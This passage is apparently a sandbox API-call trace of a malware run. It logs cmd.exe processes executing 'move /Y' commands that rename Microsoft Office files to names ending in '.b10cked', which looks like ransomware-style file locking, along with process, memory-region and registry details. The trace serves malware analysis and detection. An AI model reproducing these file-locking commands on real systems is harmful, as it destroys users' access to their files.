(in: hFindFile=0x2e2130 | out: hFindFile=0x2e2130) returned 1 [0168.532] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2e1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2e1cc0) returned 0x2e2130 [0168.532] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14e914, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0168.532] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x14e914, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll", lpFilePart=0x0) returned 0x44 [0168.532] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mor6int.rest.trx_dll")) returned 0x2020 [0168.533] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mor6int.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mor6int.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0168.533] FindClose (in: hFindFile=0x2e2130 | out: hFindFile=0x2e2130) returned 1 [0168.533] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x14e8c8 | out: _Buffer=" 1") returned 9 [0168.534] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.534] GetFileType (hFile=0x7) returned 0x2 [0168.784] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0168.784] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14e854 | out: lpMode=0x14e854) returned 1 [0168.784] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.784] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14e888 | out: lpConsoleScreenBufferInfo=0x14e888) returned 1 [0168.785] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0168.787] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14e8c8 | out: 
lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0168.787] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x14e8ac, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14e8ac*=0x1a) returned 1 [0168.787] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.788] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.788] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.788] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.789] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.789] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.789] SetConsoleInputExeNameW () returned 0x1 [0168.789] GetConsoleOutputCP () returned 0x1b5 [0168.790] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.790] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.790] exit (_Code=0) Process: id = "288" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0x7dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22734 start_va = 0x10000 end_va = 0x2ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22735 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22736 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22737 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 22738 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22739 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22740 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22741 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22742 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 22743 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22821 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22822 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = 
"" Region: id = 22823 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22824 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 22825 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 22826 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22827 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22828 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22829 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22830 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22831 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22832 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = 
mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22833 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22834 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22835 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 22836 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22837 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22928 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 22929 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 22930 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 22931 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 22932 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 22933 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000610000" filename = "" Region: id = 22934 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Thread: id = 352 os_tid = 0x930 [0168.705] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fb24 | out: lpSystemTimeAsFileTime=0x22fb24*(dwLowDateTime=0x9bb4d060, dwHighDateTime=0x1d440a9)) [0168.705] GetCurrentProcessId () returned 0x7dc [0168.705] GetCurrentThreadId () returned 0x930 [0168.705] GetTickCount () returned 0x31dad [0168.705] QueryPerformanceCounter (in: lpPerformanceCount=0x22fb1c | out: lpPerformanceCount=0x22fb1c*=22549443400) returned 1 [0168.706] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0168.707] __set_app_type (_Type=0x1) [0168.707] __p__fmode () returned 0x76b331f4 [0168.707] __p__commode () returned 0x76b331fc [0168.707] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0168.707] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0168.707] GetCurrentThreadId () returned 0x930 [0168.707] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x930) returned 0x38 [0168.707] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.708] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0168.708] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.708] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0168.708] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fab4 | out: phkResult=0x22fab4*=0x0) returned 0x2 [0168.708] VirtualQuery (in: lpAddress=0x22faeb, lpBuffer=0x22fa84, dwLength=0x1c | out: lpBuffer=0x22fa84*(BaseAddress=0x22f000, 
AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.708] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fa84, dwLength=0x1c | out: lpBuffer=0x22fa84*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0168.708] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fa84, dwLength=0x1c | out: lpBuffer=0x22fa84*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0168.708] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fa84, dwLength=0x1c | out: lpBuffer=0x22fa84*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.708] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fa84, dwLength=0x1c | out: lpBuffer=0x22fa84*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0168.708] GetConsoleOutputCP () returned 0x1b5 [0168.708] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.709] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0168.709] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.709] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0168.709] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.709] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.709] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.709] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.709] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.709] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.710] _get_osfhandle (_FileHandle=0) returned 0x3 
[0168.710] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0168.710] GetEnvironmentStringsW () returned 0x410210* [0168.710] FreeEnvironmentStringsW (penv=0x410210) returned 1 [0168.710] GetEnvironmentStringsW () returned 0x410210* [0168.710] FreeEnvironmentStringsW (penv=0x410210) returned 1 [0168.710] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea24 | out: phkResult=0x22ea24*=0x40) returned 0x0 [0168.710] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x0, lpData=0x22ea30*=0xa0, lpcbData=0x22ea28*=0x1000) returned 0x2 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x1, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x0, lpData=0x22ea30*=0x1, lpcbData=0x22ea28*=0x1000) returned 0x2 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x0, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x40, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x40, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, 
lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x0, lpData=0x22ea30*=0x40, lpcbData=0x22ea28*=0x1000) returned 0x2 [0168.711] RegCloseKey (hKey=0x40) returned 0x0 [0168.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea24 | out: phkResult=0x22ea24*=0x40) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x0, lpData=0x22ea30*=0x40, lpcbData=0x22ea28*=0x1000) returned 0x2 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x1, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x0, lpData=0x22ea30*=0x1, lpcbData=0x22ea28*=0x1000) returned 0x2 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x0, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x9, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x9, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, 
lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x0, lpData=0x22ea30*=0x9, lpcbData=0x22ea28*=0x1000) returned 0x2 [0168.712] RegCloseKey (hKey=0x40) returned 0x0 [0168.712] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886386 [0168.712] srand (_Seed=0x5b886386) [0168.712] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked\"" [0168.712] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked\"" [0168.712] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.712] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x411970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0168.713] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0168.713] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0168.713] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.713] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0168.713] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0168.713] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0168.713] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0168.713] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 
[0168.713] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0168.713] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0168.713] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0168.713] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0168.713] GetEnvironmentStringsW () returned 0x412360* [0168.713] FreeEnvironmentStringsW (penv=0x412360) returned 1 [0168.713] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.714] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.714] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0168.714] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0168.714] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0168.714] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0168.714] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0168.714] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0168.714] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0168.714] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0168.714] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f7f0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.714] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f7f0, lpFilePart=0x22f7ec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f7ec*="Desktop") returned 0x18 [0168.714] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.714] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f56c | out: lpFindFileData=0x22f56c) returned 0x4109f0 [0168.715] FindClose (in: hFindFile=0x4109f0 | out: hFindFile=0x4109f0) returned 1 [0168.715] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f56c | out: lpFindFileData=0x22f56c) returned 0x4109f0 [0168.715] FindClose (in: hFindFile=0x4109f0 | out: hFindFile=0x4109f0) returned 1 [0168.715] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f56c | out: lpFindFileData=0x22f56c) returned 0x4109f0 [0168.715] FindClose (in: hFindFile=0x4109f0 | out: hFindFile=0x4109f0) returned 1 [0168.715] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.715] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0168.716] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0168.716] GetEnvironmentStringsW () returned 0x410210* [0168.716] FreeEnvironmentStringsW (penv=0x410210) returned 1 [0168.716] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.716] GetConsoleOutputCP () returned 0x1b5 [0168.717] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.717] GetUserDefaultLCID () returned 0x409 [0168.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0168.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f930, cchData=128 | out: lpLCData="0") returned 2 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f930, cchData=128 | out: lpLCData="0") returned 2 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f930, cchData=128 | out: lpLCData="1") returned 2 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0168.718] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0168.718] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0168.719] GetConsoleTitleW (in: lpConsoleTitle=0x400930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.720] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 